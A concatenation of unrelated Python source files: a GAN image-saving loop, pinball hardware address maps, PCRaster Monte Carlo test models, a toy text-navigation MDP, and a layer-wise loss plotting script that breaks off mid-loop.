att_b_[..., i - 1] = att_b_[..., i - 1] * args.test_int / args.thres_int
a_enc = genc(img_a)
samples.append(gdec(a_enc, att_b_))
cat = ops.Concat(axis=3)
samples = cat(samples).asnumpy()
result = denorm(samples)
result = np.reshape(result, (128, -1, 3))
im = Image.fromarray(np.uint8(result))
if args.custom_img:
out_file = test_dataset.images[it]
else:
out_file = "{:06d}.jpg".format(it + 182638)
im.save(output_path + '/' + out_file)
print('Successful save image in ' + output_path + '/' + out_file)
it += 1
|
"""Defines for FAST Boards."""
HARDWARE_KEY = {
"fast": '2000',
"sys11": '1100',
"wpc89": '8900',
"wpc95": '9500'
}
RETRO_SWITCH_MAP = {
# Name HEX DEC
'S11': '00', # 00
'S12': '01', # 01
'S13': '02', # 02
'S14': '03', # 03
'S15': '04', # 04
'S16': '05', # 05
'S17': '06', # 06
'S18': '07', # 07
'S21': '08', # 08
'S22': '09', # 09
'S23': '0A', # 10
'S24': '0B', # 11
'S25': '0C', # 12
'S26': '0D', # 13
'S27': '0E', # 14
'S28': '0F', # 15
'S31': '10', # 16
'S32': '11', # 17
'S33': '12', # 18
'S34': '13', # 19
'S35': '14', # 20
'S36': '15', # 21
'S37': '16', # 22
'S38': '17', # 23
'S41': '18', # 24
'S42': '19', # 25
'S43': '1A', # 26
'S44': '1B', # 27
'S45': '1C', # 28
'S46': '1D', # 29
'S47': '1E', # 30
'S48': '1F', # 31
'S51': '20', # 32
'S52': '21', # 33
'S53': '22', # 34
'S54': '23', # 35
'S55': '24', # 36
'S56': '25', # 37
'S57': '26', # 38
'S58': '27', # 39
'S61': '28', # 40
'S62': '29', # 41
'S63': '2A', # 42
'S64': '2B', # 43
'S65': '2C', # 44
'S66': '2D', # 45
'S67': '2E', # 46
'S68': '2F', # 47
'S71': '30', # 48
'S72': '31', # 49
'S73': '32', # 50
'S74': '33', # 51
'S75': '34', # 52
'S76': '35', # 53
'S77': '36', # 54
'S78': '37', # 55
'S81': '38', # 56
'S82': '39', # 57
'S83': '3A', # 58
'S84': '3B', # 59
'S85': '3C', # 60
'S86': '3D', # 61
'S87': '3E', # 62
'S88': '3F', # 63
'S91': '40', # 64
'S92': '41', # 65
'S93': '42', # 66
'S94': '43', # 67
'S95': '44', # 68
'S96': '45', # 69
'S97': '46', # 70
'S98': '47', # 71
'S101': '48', # 72
'S102': '49', # 73
'S103': '4A', # 74
'S104': '4B', # 75
'S105': '4C', # 76
'S106': '4D', # 77
'S107': '4E', # 78
'S108': '4F', # 79
# Directs
'SD1': '50', # 80
'SD2': '51', # 81
'SD3': '52', # 82
'SD4': '53', # 83
'SD5': '54', # 84
'SD6': '55', # 85
'SD7': '56', # 86
'SD8': '57', # 87
# Fliptronics
'SF1': '58', # 88
'SF2': '59', # 89
'SF3': '5A', # 90
'SF4': '5B', # 91
'SF5': '5C', # 92
'SF6': '5D', # 93
'SF7': '5E', # 94
'SF8': '5F', # 95
# DIP switches
# These addresses are also used by Fliptronics switches (above) but can be
# used in non-Fliptronics machines (e.g. System11) as regular switches.
'DIP1': '58', # 88
'DIP2': '59', # 89
'DIP3': '5A', # 90
'DIP4': '5B', # 91
'DIP5': '5C', # 92
'DIP6': '5D', # 93
'DIP7': '5E', # 94
'DIP8': '5F', # 95
}
RETRO_LIGHT_MAP = {
'L11': '00', 'L12': '01', 'L13': '02', 'L14': '03',
'L15': '04', 'L16': '05', 'L17': '06', 'L18': '07',
'L21': '08', 'L22': '09', 'L23': '0A', 'L24': '0B',
'L25': '0C', 'L26': '0D', 'L27': '0E', 'L28': '0F',
'L31': '10', 'L32': '11', 'L33': '12', 'L34': '13',
'L35': '14', 'L36': '15', 'L37': '16', 'L38': '17',
'L41': '18', 'L42': '19', 'L43': '1A', 'L44': '1B',
'L45': '1C', 'L46': '1D', 'L47': '1E', 'L48': '1F',
'L51': '20', 'L52': '21', 'L53': '22', 'L54': '23',
'L55': '24', 'L56': '25', 'L57': '26', 'L58': '27',
'L61': '28', 'L62': '29', 'L63': '2A', 'L64': '2B',
'L65': '2C', 'L66': '2D', 'L67': '2E', 'L68': '2F',
'L71': '30', 'L72': '31', 'L73': '32', 'L74': '33',
'L75': '34', 'L76': '35', 'L77': '36', 'L78': '37',
'L81': '38', 'L82': '39', 'L83': '3A', 'L84': '3B',
'L85': '3C', 'L86': '3D', 'L87': '3E', 'L88': '3F',
}
RETRO_DRIVER_MAP = {
'C01': '00', 'C02': '01', 'C03': '02', 'C04': '03',
'C05': '04', 'C06': '05', 'C07': '06', 'C08': '07',
'C09': '08', 'C10': '09', 'C11': '0A', 'C12': '0B',
'C13': '0C', 'C14': '0D', 'C15': '0E', 'C16': '0F',
'C17': '10', 'C18': '11', 'C19': '12', 'C20': '13',
'C21': '14', 'C22': '15', 'C23': '16', 'C24': '17',
'C25': '18', 'C26': '19', 'C27': '1A', 'C28': '1B',
'C29': '1C', 'C30': '1D', 'C31': '1E', 'C32': '1F',
'C33': '24', 'C34': '25', 'C35': '26', 'C36': '27',
'C37': '28', 'C38': '29', 'C39': '2A', 'C40': '2B',
'C41': '2C', 'C42': '2D', 'C43': '2E', 'C44': '2F',
'FLRM': '20', 'FLRH': '21', 'FLLM': '22', 'FLLH': '23',
'FURM': '24', 'FURH': '25', 'FULM': '26', 'FULH': '27',
}
RETRO_GI_MAP = {
'G01': '00', 'G02': '01', 'G03': '02', 'G04': '03',
'G05': '04', 'G06': '05', 'G07': '06', 'G08': '07',
}
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import pcraster
import pcraster.framework.dynamicPCRasterBase as dynamicPCRasterBase
import pcraster.framework.mcPCRasterBase as mcPCRasterBase
import pcraster.framework.pfPCRasterBase as pfPCRasterBase
import pcraster.framework.staticPCRasterBase as staticPCRasterBase
class StaticWithoutAll(staticPCRasterBase.StaticModel, mcPCRasterBase.MonteCarloModel):
def __init__(self):
staticPCRasterBase.StaticModel.__init__(self)
mcPCRasterBase.MonteCarloModel.__init__(self)
def initial(self):
pass
class DynamicWithoutAll(dynamicPCRasterBase.DynamicModel, mcPCRasterBase.MonteCarloModel):
def __init__(self):
dynamicPCRasterBase.DynamicModel.__init__(self)
mcPCRasterBase.MonteCarloModel.__init__(self)
def initial(self):
pass
class StaticWithoutSuspend(staticPCRasterBase.StaticModel, mcPCRasterBase.MonteCarloModel):
def __init__(self):
staticPCRasterBase.StaticModel.__init__(self)
mcPCRasterBase.MonteCarloModel.__init__(self)
def initial(self):
pass
def updateWeight(self):
pass
class DynamicWithoutSuspend(dynamicPCRasterBase.DynamicModel, mcPCRasterBase.MonteCarloModel):
def __init__(self):
dynamicPCRasterBase.DynamicModel.__init__(self)
mcPCRasterBase.MonteCarloModel.__init__(self)
def initial(self):
pass
def updateWeight(self):
pass
class StaticWithoutResume(mcPCRasterBase.MonteCarloModel):
def __init__(self):
pass
def initial(self):
pass
def updateWeight(self):
pass
def suspend(self):
pass
class DynamicWithoutResume(mcPCRasterBase.MonteCarloModel):
def __init__(self):
pass
def initial(self):
pass
def updateWeight(self):
pass
def suspend(self):
pass
#
class T0(mcPCRasterBase.MonteCarloModel):
def __init__(self):
pass
#
class T1(mcPCRasterBase.MonteCarloModel):
def __init__(self):
pass
#
class staticModel(mcPCRasterBase.MonteCarloModel):
def __init__(self):
mcPCRasterBase.MonteCarloModel.__init__(self)
staticPCRasterBase.StaticModel.__init__(self)
pcraster.setclone("clone.map")
self.newmap = pcraster.readmap("clone.map")
def initial(self):
name = "mcsi%d" % (self.currentSampleNumber())
self.report(self.newmap, name)
def premcloop(self):
for sample in self.sampleNumbers():
name = "premc%d" % (sample)
self.report(self.newmap, name)
def postmcloop(self):
for sample in self.sampleNumbers():
name = "postmc%d" % (sample)
self.report(self.newmap, name)
#
class DynamicModel(dynamicPCRasterBase.DynamicModel, mcPCRasterBase.MonteCarloModel, pfPCRasterBase.ParticleFilterModel):
def __init__(self):
dynamicPCRasterBase.DynamicModel.__init__(self)
mcPCRasterBase.MonteCarloModel.__init__(self)
pfPCRasterBase.ParticleFilterModel.__init__(self)
pcraster.setclone("clone.map")
self.newmap = pcraster.readmap("clone.map")
def initial(self):
name = "mcdi%d" % (self.currentSampleNumber())
self.report(self.newmap, name)
self.stateVar = self.currentSampleNumber()
def premcloop(self):
for sample in self.sampleNumbers():
for timestep in self.timeSteps():
name = "premc_%d_%d" % (sample, timestep)
self.report("clone.map", name)
def postmcloop(self):
for sample in self.sampleNumbers():
for timestep in self.timeSteps():
name = "postmc_%d_%d" % (sample, timestep)
self.report("clone.map", name)
def dynamic(self):
name = "mcdd%d" % (self.currentSampleNumber())
self.report("clone.map", name)
def updateWeight(self):
return random.random()
def suspend(self):
assert self.stateVar == self.currentSampleNumber()
def resume(self):
assert self.stateVar == self.currentSampleNumber()
|
"""
Toy example of navigating through text to find the answer to a query.
This is the simplest possible version of the problem.
"""
from control4.core.mdp import MDP
from control4.config import floatX
import numpy as np
def idx2onehot(i,n):
out = np.zeros(n,floatX)
out[i] = 1
return out
class TextNavState(object):
def __init__(self,textarr,answer,pos):
self.textarr = textarr
self.binarr = textarr2binarr(self.textarr)
self.answer = answer
self.pos = pos
def printme(self):
textarr = self.textarr.copy()
r,c = self.pos
textarr[r,c] = "&"
print
print "\n".join([" ".join(row) for row in textarr])
print
def gen_textarr(height,width,xblocksize):
xblockrow = np.random.randint(low=0,high=height-xblocksize)
xblockcol = np.random.randint(low=0,high=width-xblocksize)
arow = np.random.randint(low=xblockrow,high=xblockrow+xblocksize)
acol = np.random.randint(low=xblockcol,high=xblockcol+xblocksize)
textarr = np.zeros((height,width),dtype="S1")
textarr[:] = "."
textarr[xblockrow:xblockrow+xblocksize,xblockcol:xblockcol+xblocksize]="*"
ans = np.random.randint(low=0,high=2)
textarr[arow,acol] = str(ans)
return textarr,ans
def textarr2binarr(textarr):
chars = [".","*","0","1"]
height,width = textarr.shape
char2bin = {c:idx2onehot(chars.index(c),len(chars)) for c in chars}
binarr = np.empty((height,width,len(chars)),'uint8')
for row in xrange(height):
for col in xrange(width):
binarr[row,col] = char2bin[textarr[row,col]]
return binarr
class TextNav(MDP):
def __init__(self, width=10,height=10,xblocksize=3):
self.width = width
self.height = height
self.xblocksize = xblocksize
def call(self, input_arrs):
state = input_arrs["x"]
u = input_arrs["u"]
assert u.shape[0]==1
u = u[0]
# NESW + A0 A1
height,width = state.textarr.shape
row,col = state.pos
done = False
cost = 0
if u == 0: # NORTH
row = max(row-1,0)
elif u == 1: # EAST
col = min(col+1,width-1)
elif u == 2: # SOUTH
row = min(row+1,height-1)
elif u == 3: # WEST
col = max(col-1,0)
else: # answer 0,1
cost = (u-4==state.answer) - .4
done = True
state.pos = (row,col)
o = np.concatenate([state.binarr[row,col], state.pos / np.array([self.width,self.height],floatX)-.5]).astype(floatX)
return {
"x" : state,
"o" : o.reshape(1,-1),
"c" : np.array(cost).reshape(1,-1).astype(floatX),
"done" : done
}
def initialize_mdp_arrays(self):
textarr,ans = gen_textarr(self.height, self.width,self.xblocksize)
pos = (np.random.randint(low=0,high=self.height),np.random.randint(low=0,high=self.width))
state = TextNavState(textarr,ans,pos)
o_init = np.concatenate([state.binarr[pos[0],pos[1]],pos / np.array([self.width,self.height],floatX)-.5])
return {
"x" : state,
"o" : o_init.reshape(1,-1).astype(floatX),
}
def input_info(self):
return {
"x" : None,
"u" : (1,'int64')
}
def output_info(self):
return {
"x" : None,
"o" : (6,floatX),
"c" : (1,floatX),
"done" : (None,'uint8')
}
def plot(self,input_arrs):
x = input_arrs["x"]
x.printme()
def cost_names(self):
return ["correct"]
def num_actions(self):
return 6
if __name__ == "__main__":
mdp = TextNav()
mdp.validate() |
<filename>merge_vars.py<gh_stars>0
import torch
import numpy as np
import pandas as pd
import os
import sys
from torchsummary import summary
import torch.nn as nn
from collections import defaultdict
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
matplotlib.style.use('ggplot')
import seaborn as sns
sns.set_theme()
sns.set(font_scale=3, rc={'text.usetex' : False})
sns.set_theme()
sns.set_style('whitegrid')
import glob
import re
import pdb
import math
import models
import random
import torch.optim
import torch
import argparse
import utils
from sklearn.linear_model import LogisticRegression
#from torchvision import models, datasets, transforms
try:
from tqdm import tqdm
except:
def tqdm(x): return x
def process_epochs(epochs, dirname):
fig = plt.figure()
columns = pd.Index(range(0, len(epochs)), name='layer')
df = pd.DataFrame(epochs, index=['epoch'], columns=columns)
df = df.melt()
s = df.plot(x='layer', y='value', kind='scatter', ylabel='epoch')
s.set(ylabel="epoch")
plt.savefig(fname=os.path.join(dirname, 'epochs.pdf'))
return
def select_min(df):
"""Select the test with the minimal error (usually 0)"""
Idx = pd.IndexSlice
df_min = None
n_layers = len(df.columns.levels[0])
#columns = df.columns.name
indices = np.zeros(n_layers, dtype=int)
for idx in range(n_layers):
# replace NaN with 0
val_min = df.loc[:, (idx, 'error')].min()
mask = df.loc[:, (idx, 'error')] == val_min
indices[idx] = df.loc[mask, (idx, 'loss')].idxmin() # if several min, take the min of them
# the indices for the try that has the minimum training
# error at the epoch epoch
# remove the column index 'try'
cols = pd.MultiIndex.from_product(df.columns.levels, names=df.columns.names) # all but the try
df_min = pd.DataFrame(columns=cols, index=[1])
df_min.index.name = 'step'
for idx in range(n_layers):
# select the try that has the minimum training error at the
# last epoch (at index indices[idx])
df_min.loc[1, Idx[idx, :]] = df.loc[indices[idx],Idx[idx, :]]#.droplevel('try', axis=1)
#df_min.loc[:, df_min.columns.get_level_values('layer') == 'last'] = df.xs(('last', idx_last), axis=1, level=[2, 3], drop_level=False).droplevel('try', axis=1)
#df_min.loc[:, df_min.columns.get_level_values('stat') == 'err'] *= 100
#df_min = df_min.loc[pd.IndexSlice[:, df_min.columns.get_level_values('layer').isin(range(1, n_layers+1))]]
#if not df.loc[epoch, ('train', 'err', 1, indices[0] )] == 0:
# print('Not separated!', dirname)
#else:
return df_min
# print('Separated!', dirname)
def process_df(quant, dirname, stats_ref=None, args=None, args_model=None, save=True):
global table_format
idx = pd.IndexSlice
#losses = quant.loc[:, idx[:, '#loss']]
#errors = quant.loc[:, idx[:, 'error']]
#col_order = ["layer", "set", "stat"]
col_order = ["stat", "set", "layer"]
if quant.columns.names != col_order:
# the order is
# perform pivot
quant = pd.melt(quant.reset_index(), id_vars="var").pivot(index="var", columns=col_order, values="value")
idx_order = ["stat", "set"]
if stats_ref.index.names !=idx_order:
stats_ref = stats_ref.reorder_levels(idx_order).sort_index(axis=0)
quant_describe = quant.groupby(level=["stat", "set"], axis=1, group_keys=False).describe()
if save:
quant.to_csv(os.path.join(dirname, 'quant.csv'))
if stats_ref is not None:
stats_ref.to_csv(os.path.join(dirname, 'stats_ref.csv'))
quant_describe.to_csv(os.path.join(dirname, 'describe.csv'))
# table_err_train = table["err"]["train"]
#quant.loc[:, Idx[:, :, "err"]] *= 100
if len(stats_ref.keys()) == 1:
stats_ref = stats_ref[stats_ref.keys()[0]]
#quant["err"] *= 100
#stats_ref_copy = stats_ref.copy()
#stats_ref_copy["err"] = stats_ref["err"] * 100
stats_ref.sort_index(axis=0, inplace=True)
quant.sort_index(axis=1, inplace=True)
#losses.to_csv(os.path.join(dirname, 'losses.csv'))
#errors.to_csv(os.path.join(dirname, 'errors.csv'))
N_L = len(quant.columns.unique(level="layer")) # number of layers
#N_sets = len(quant.columns.unique(level="set"))
N_sets=2 # only train and test
palette=sns.color_palette(n_colors=N_sets)
#losses.describe().to_csv(os.path.join(dirname, 'losses_describe.csv'))
df_reset = quant.reset_index()
#relative quantities
#N_L = len(quant.columns.unique(level="layer")) -1 # number of hidden layers
N_S = len(stats_ref)
stats_ref_val = stats_ref.iloc[np.repeat(np.arange(N_S), N_L)].values
quant_rel = (quant.loc[:, Idx[:, :, :]] - stats_ref_val).abs()
quant_rel["err"] *= 100
quant["err"] *= 100
try:
# utils.to_latex(dirname, quant, table_format)
utils.to_latex(dirname, quant_rel, table_format)
except:
pass
#quant_rel["err"] *= 100
#errors.describe().to_csv(os.path.join(dirname, 'errors_describe.csv'))
#f, axes = plt.subplots(1, 2, figsize=[10., 5.])
df_reset = quant.reset_index()
df_plot = pd.melt(df_reset, id_vars='try')
df_reset_rel = quant_rel.reset_index()
df_plot_rel = pd.melt(df_reset_rel, id_vars="var")
rp = sns.relplot(
#data = df_plot.query('layer > 0'),
data=df_plot_rel,
#col='log_mult',
hue='set',
hue_order=["train", "test"],
#dodge=False,
col='stat',
col_order=["loss", "err"],
#col='set',
#style='layer',
#col='log_mult',
x='layer',
y='value',
kind='line',
ci='sd',
palette=palette,
#ax=axes[0],
#kind='line',
#ylabel='%',
#ci='sd',
#col_wrap=2,
facet_kws={
'sharey': False,
'sharex': True
}
)
rp.axes[0,0].set_title("Loss")
rp.axes[0,0].set_ylabel("absolute delta loss")
rp.axes[0,1].set_title("Error")
rp.axes[0,1].set_ylabel("absolute delta error (%)")
rp.legend.set_title("Datasets")
# rp.fig.set_size_inches(11,4)
#rp.axes[0,0].margins(.05)
#rp.axes[0,1].margins(.05)
# rp.legend.set_title("Datasets")
# rp.fig.set_size_inches(12, 4.5)
# rp.axes[0,0].margins(.05)
# rp.axes[0,1].margins(.05)
rp.set(xticks=range(N_L))
# xlabels=np.arange(N_L)
# rp.axes[0,0].set_xticklabels(np.arange(N_L))
# rp.axes[0,1].set_xticklabels(np.arange(N_L))
#rp.set_xticks(len(xlabels))
# rp.set_xlabels(xlabels)
rp.axes[0,0].set_xlabel("layer index l")
rp.axes[0,1].set_xlabel("layer index l")
if args_model is not None:
rp.fig.suptitle("(A) FCN {}".format(args_model.dataset.upper()))
# try:
# # vl_left = rp.axes[0,0].viewLim
# # Dx = vl_left[1][0] - vl_left[0][0]
# # Dy = vl_left[1][1] - vl_left[0][1]
# ax0 = rp.axes[0,0]
# pt = (ax0.viewLim.x0,0)
# #(0,0) in axes coordinates
# x,y = (ax0.transData + ax0.transAxes.inverted()).transform(pt)
# K = 0.1
# x = x-K
# rp.axes[0,0].text(x, y+K, "{:.2f}".format(stats_ref["loss"]["train"]), color=palette[0], transform=rp.axes[0,0].transAxes)
# rp.axes[0,0].text(x, y-K, "{:.2f}".format(stats_ref["loss"]["test"]), color=palette[1], transform=rp.axes[0,0].transAxes)
# # vl_right = rp.axes[0,1].viewLim
# # Dx = vl_right[1][0] - vl_right[0][0]
# # Dy = vl_right[1][1] - vl_right[0][1]
# ax1 = rp.axes[0,1]
# pt = (ax1.viewLim.x0,0)
# #(0,0) in axes coordinates
# x,y = (ax1.transData + ax1.transAxes.inverted()).transform(pt)
# K = 0.1
# x = x-K
# rp.axes[0,1].text(x, y+K, "{:.2f}".format(100*stats_ref["err"]["train"]), color=palette[0], transform=rp.axes[0,1].transAxes)
# rp.axes[0,1].text(x, y-K, "{:.2f}".format(100*stats_ref["err"]["test"]), color=palette[1], transform=rp.axes[0,1].transAxes)
# except:
# pass
sns.lineplot(
#data=rel_losses.min(axis=0).to_frame(name="loss"),
data=df_plot_rel.query("stat=='loss'").pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
#hue="width",
hue="set",
hue_order=["train", "test"],
#col="stat",
#col_order=["loss", "error"],
x="layer",
y="value",
#kind='line',
#legend="full",
#style='set',
legend=False,
ax=rp.axes[0,0],
alpha=0.5,
#style='layer',
#markers=['*', '+'],
dashes=[(2,2),(2,2)],
)
for ax in rp.axes[0,0].lines[-2:]: # the last two
ax.set_linestyle('--')
sns.lineplot(
#data=rel_losses.min(axis=0).to_frame(name="loss"),
data=df_plot_rel.query("stat=='err'").pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
#hue="width",
hue="set",
hue_order=["train", "test"],
#col="stat",
#col_order=["loss", "error"],
x="layer",
y="value",
#kind='line',
#legend="full",
#style='set',
legend=False,
ax=rp.axes[0,1],
alpha=0.5,
#palette=sns.color_palette(n_colors=N_L),
#style='layer',
markers=True,
dashes=[(2,2),(2,2)],
)
# rp.axes[0,1].lines[-1].set_linestyle('--')
for ax in rp.axes[0,1].lines[-2:]: # the last two
ax.set_linestyle('--')
# if stats_ref is not None:
# sns.lineplot(
# data=stats_ref.query('stat=="loss"').reset_index(), # repeat the datasaet N_L times
# hue='set',
# hue_order=["train", "test"],
# ax=rp.axes[0,0],
# x=np.tile(np.linspace(1, N_L, num=N_L), 2),
# style='set',
# dashes=True,
# legend=False,
# #y="value",)
# )
# sns.lineplot(
# data=stats_ref.query('stat=="err"').iloc[np.tile(np.arange(2), N_L)].reset_index(), # repeat the datasaet N_L times
# hue='set',
# hue_order=["train", "test"],
# ax=rp.axes[0,1],
# x=np.tile(np.linspace(0, N_L, num=N_L), 2),
# style='set',
# dashes=True,
# legend=False,
# #dashes=[(2,2),(2,2)],
# #y="value",)
# )
# sns.lineplot(
# #data=df_plot.stats_ref.query('stat=="err"').iloc[np.tile(np.arange(2), N_L)].reset_index(), # repeat the datasaet N_L times
# data=df_plot.query('stat=="loss"').pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
# hue='set',
# hue_order=["train", "test"],
# ax=rp.axes[0,0],
# #x=np.tile(np.linspace(0, N_L, num=N_L), 2),
# x='layer',
# alpha=0.5,
# style='set',
# dashes=True,
# legend=False,
# #dashes=[(2,2),(2,2)],
# y="value",)
# sns.lineplot(
# #data=df_plot.stats_ref.query('stat=="err"').iloc[np.tile(np.arange(2), N_L)].reset_index(), # repeat the datasaet N_L times
# data=df_plot.query('stat=="err"').pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
# hue='set',
# hue_order=["train", "test"],
# ax=rp.axes[0,1],
# #x=np.tile(np.linspace(0, N_L, num=N_L), 2),
# x='layer',
# alpha=0.5,
# style='set',
# dashes=True,
# legend=False,
# #dashes=[(2,2),(2,2)],
# y="value",)
#rpset_xticklabels(range(N_L))
# if is_vgg:
# xlabels=["conv1", "conv2", "conv3", "conv4", "conv5", "conv6", "conv7", "conv8", "fc1", "fc2"]
# #mp.set_xticks(len(xlabels))
# rp.set_xlabels(xlabels)
#if stats_ref is not None:
plt.savefig(fname=os.path.join(dirname, 'relplot.pdf'), bbox_inches="tight")
plt.figure()
#df_reset = quant.().reset_index()
#df_plot = pd.melt(df_reset, id_vars='try')
bp = sns.relplot(
data=df_plot.pivot(index="var", columns=col_order).min(axis=0).to_frame(name="value"),
#col='log_mult',
hue='set',
hue_order=["train", "test"],
#dodge=False,
col='stat',
col_order=["loss", "err"],
#col_order=["train", "test", "val"],
#kcol="set",
#col='set',
#style='layer',
#col='log_mult',
x='layer',
y='value',
kind='line',
#ci=100,
#ax=axes[0],
#kind='line',
#ylabel='%',
#ci=100,
#col_wrap=2,
facet_kws={
'sharey': False,
'sharex': True
}
)
df_ref = df_plot.query('layer==0')
bp.axes[0,0].set_title("Loss")
bp.axes[0,0].set_ylabel("loss")
bp.axes[0,1].set_title("Error")
bp.axes[0,1].set_ylabel("absolute error (%)")
#bp.axes[0,0].plot(quant.columns.levels("layer"), quant.loc[1, (0, "loss")], color=red, label='')
plt.savefig(fname=os.path.join(dirname, 'min_plot.pdf'))
fig=plt.figure()
df_reset = quant.notnull().reset_index()
df_plot = pd.melt(df_reset, id_vars='try')
g = sns.relplot(
data = df_plot,
#col='',
#hue='set',
col='stat',
x='layer',
y='value',
kind='line',
ci=None,
#col_wrap=2,
facet_kws={
'sharey': False,
'sharex': True
}
)
g.fig.subplots_adjust(top=0.9, left=1/g.axes.shape[1] * 0.1)
if args_model is not None and args is not None:
width = args_model.width
if width is None:
if args_model.dataset == "mnist":
width = 245 # WARNING hard coded
removed = "width / {}".format(args.fraction) if hasattr(args, 'fraction') and args.fraction is not None else args.remove
g.fig.suptitle('ds = {}, width = {}, removed = {}, try = {}'.format(args_model.dataset, width, removed, args.ntry))
g.set(yscale='linear')
plt.savefig(fname=os.path.join(dirname, 'plot.pdf'))
g.set(yscale='log')
plt.savefig(fname=os.path.join(dirname, 'plot_log.pdf'))
plt.close('all')
return
def process_checkpoint(checkpoint):
'''Read and process a previously computed result stored inside a checkpoint (for the copy test)'''
quant = checkpoint['quant']
args = checkpoint['args']
idx = pd.IndexSlice
process_df(quant, args.path_output)
return
def read_csv(file_csv):
'''Read and process a previously computed result stored inside a checkpoint'''
idx = pd.IndexSlice
quant = pd.read_csv(file_csv, header=[0,1,2], index_col=0)
nlevels = quant.columns.nlevels
layer_idx = quant.columns.names.index("layer")
if quant.columns.get_level_values(layer_idx).dtype != int: # set the type to int for the layers
new_layer_lvl = list(map(int, quant.columns.get_level_values(layer_idx)))
levels = [quant.columns.get_level_values(i) if i != layer_idx else new_layer_lvl for i in range(nlevels)]
cols = pd.MultiIndex.from_arrays(levels, names=quant.columns.names)
quant.columns = cols
return quant
def process_csv(file_csv):
'''Read and process a previously computed result stored inside a checkpoint'''
quant = read_csv(file_csv)
file_chkpt = os.path.join(os.path.dirname(file_csv), "checkpoint.pth")
args_model=None
if os.path.isfile(file_chkpt ):
chkpt = torch.load(file_chkpt)
args_model = chkpt["args"]
dirname = os.path.dirname(file_csv)
process_df(quant, dirname, args_model=args_model, save=False)
return
# def eval_test_set(checkpoint, fname, log_fname):
# '''Eval the model on the test set'''
# args = checkpoint['args']
# quant = checkpoint['quant']
# train_dataset, test_dataset, num_chs = utils.get_dataset(dataset=args.dataset,
# dataroot=args.dataroot,
# )
# train_loader, size_train,\
# val_loader, size_val,\
# test_loader, size_test = utils.get_dataloader( train_dataset, test_dataset, batch_size =args.batch_size, ss_factor=1, size_max=args.size_max, collate_fn=None, pin_memory=True)
# classifier = utils.parse_archi(log_fname)
# loss_test, err_test = eval_epoch(model, test_loader)
# quant.columns.name = add_sets
# quant.loc[epoch, ('test', 'loss')] = loss_test
# quant.loc[epoch, ('test', 'err')] = err_test
def process_subdir(subdir, device, N_L=5, N_T=20):
# subdir will have different entry_n results, all with the same number of
# removed units
# 1. process all the entry_n files
# 2. store the results in a bundle dataframe (do not forget the different
# epochs)
# 3. save / plot the resulting bundle dataframe
regex_entry = re.compile("entry_(\d+)")
layers = np.arange(1, N_L+1)#classifier.n_layers) # the different layers, forward order
stats = ['loss', 'error']
#tries = np.arange(1, 1+args.ntry) # the different tries
names=['set', 'layer', 'stat']
columns=pd.MultiIndex.from_product([layers, stats], names=names)
#index = pd.Index(np.arange(1, start_epoch+args.nepochs+1), name='epoch')
index = pd.Index(np.arange(1, N_T+1), name='steps')
df_bundle = pd.DataFrame(columns=columns, index=index, dtype=float)
epochs = {}
df_bundle.sort_index(axis=1, inplace=True) # sort for quicker access
Idx = pd.IndexSlice
for file_entry in glob.glob(os.path.join(subdir, "checkpoint_entry_*.pth"), recursive=False):
#match = regex_entry.search(file_entry)
#if match is None:
# continue
checkpoint = torch.load(file_entry, map_location=device)
idx_entry = checkpoint['args'].entry_layer#int(match.groups()[0])
if idx_entry > 0:
args = checkpoint['args']
epoch = checkpoint['epochs']
quant = checkpoint['quant']
#if not 'set' in quant.columns.names:
#checkpoint = eval_test_set(checkpoint, file_entry)
df_bundle = pd.concat([df_bundle, quant], ignore_index=False, axis=1)
#df_bundle.loc[Idx[:, (idx_entry,'loss')]] = quant.loc[Idx[epoch, ('train', 'loss')]]
#df_bundle.loc[Idx[:, (idx_entry,'error')]] = quant.loc[Idx[epoch, ('train', 'err')]]
epochs[idx_entry] = epoch
df_bundle.sort_index(axis=1, inplace=True) # sort for quicker access
return df_bundle, epochs, args
if __name__ == '__main__':
torch.autograd.set_detect_anomaly(True)
parser = argparse.ArgumentParser('Combine the different vars for experiment A/B')
#parser.add_argument('--dataset', '-dat', default='mnist', type=str, help='dataset')
#parser.add_argument('--dataroot', '-droot', default='./data/', help='the root for the input data')
parser.add_argument('--name', default='eval-copy', type=str, help='the name of the experiment')
#parser.add_argument('--vary_name', nargs='*', default=None, help='the name of the parameter to vary in the name (appended)')
parser_model = parser.add_mutually_exclusive_group(required=False)
parser_model.add_argument('--model', help='path of the model to separate')
parser_model.add_argument('--checkpoint', help='path of the previous computation checkpoint')
parser_model.add_argument('--csv', help='path of the previous saved csv file')
parser.add_argument('--gd_mode', '-gdm', default='stochastic', choices=['full', 'stochastic'], help='whether the gradient is computed full batch or stochastically')
parser_device = parser.add_mutually_exclusive_group()
parser_device.add_argument('--cpu', action='store_true', dest='cpu', help='force the cpu model')
parser_device.add_argument('--cuda', action='store_false', dest='cpu')
parser.add_argument('--depth_max', type=int, help='the maximum depth to which operate')
#parser.add_argument('--end_layer', type=int, help='if set the maximum layer for which to compute the separation (forward indexing)')
parser.add_argument('--steps', type=int, default=10, help='The number of steps to take')
parser.add_argument('--table_format', choices=["wide", "long"], default="long")
parser.set_defaults(cpu=False)
parser.add_argument('dirs', nargs='*', help='the directory to process')
args = parser.parse_args()
table_format = args.table_format
device = torch.device('cuda' if torch.cuda.is_available() and not args.cpu else 'cpu')
#device = torch.device('cpu')
dtype = torch.float
num_gpus = torch.cuda.device_count()
def get_parent(path):
return os.path.basename(os.path.dirname(path))
def parse_width(fname):
width_regexp = re.compile("W-\(\d\+\)")
found = width_regexp.find(width_regexp, fname)
return found[1]
Idx = pd.IndexSlice
common_dir = os.path.commonpath(args.dirs)
path_merge = os.path.join(common_dir, 'merge')
fnames = []
for dname in args.dirs:
fnames.extend(glob.glob(os.path.join(dname, "**", "quant.csv"), recursive=True))
unique_ids = set(list(map(get_parent, fnames)))
for uid in unique_ids: # for every f2 etc experiments
path_output = os.path.join(path_merge, uid)
df_merge = pd.DataFrame(index=pd.Index([], name="var"))
df_ref_merge = pd.DataFrame(index=pd.Index([], name="var"))
os.makedirs(path_output, exist_ok=True)
for directory in args.dirs:
vid = int(''.join([c for c in os.path.basename(directory.rstrip('/')) if c.isdigit()]))
id_fnames = glob.glob(os.path.join(directory, "**", uid, "quant.csv"), recursive=True)
for fn in id_fnames: # for all variations
